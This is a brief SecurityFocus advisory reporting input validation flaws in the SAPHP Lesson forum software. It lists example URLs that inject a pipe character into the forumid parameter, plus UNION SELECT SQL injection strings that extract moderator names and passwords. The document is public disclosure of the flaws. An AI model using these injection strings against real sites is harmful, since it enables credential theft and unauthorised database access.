SAPHP Lesson Multiple Input Validation Vulnerabilities

No exploit is required.

Example URI have been provided:

http://www.example.com/dros/showcat.php?forumid=|almaster
http://www.example.com/dros/add.php?forumid=|almaster
http://www.example.com/dros/showcat.php?forumid=-1%20UNION%20SELECT%20ModName%20FROM%20modretor
http://www.example.com/dros/showcat.php?forumid=-1%20UNION%20SELECT%20ModPassword%20FROM%20modretor


 

Privacy Statement
Copyright 2010, SecurityFocus